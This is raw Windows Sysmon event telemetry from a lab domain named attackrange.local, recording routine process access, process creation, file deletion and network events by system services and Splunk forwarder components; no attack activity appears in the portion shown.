11:18:19.322{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.322{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-17FB-6216-3A07-000000003802}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.322{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.322{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.322{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17FB-6216-3A07-000000003802}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.323{C8EA50B7-17FB-6216-3A07-000000003802}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:20.983{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017FCE8BBF240A40F38C1E7042E1C5AB,SHA256=D9E89D0429A23B12B4B0634E6B523F500C5E418E81D151E7433047D6DF2AACBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.921{C8EA50B7-17FC-6216-3C07-000000003802}62405428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.752{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F09AC1D339B380A46525E195930E5A4,SHA256=468DCF8FD7F6516C064FC37FA073864E8D479A57A4E273A0DA43B8C6A61A7B4A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17FC-6216-3C07-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-17FC-6216-3C07-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.668{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17FC-6216-3C07-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.669{C8EA50B7-17FC-6216-3C07-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.268{C8EA50B7-17FC-6216-3B07-000000003802}64447140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000297785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:17.711{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49479-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17FC-6216-3B07-000000003802}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-17FC-6216-3B07-000000003802}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.006{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17FC-6216-3B07-000000003802}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:20.007{C8EA50B7-17FC-6216-3B07-000000003802}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.753{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6A7AED267FB8338FCCF8CF15B4339E,SHA256=D412B2DE05CA10AE0EAA854BE1D27176519C4249D2F9A16DC0D898F4BB70A2C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:19.528{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51665-false10.0.1.12-8000- 10341000x8000000000000000297804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.337{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17FD-6216-3D07-000000003802}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 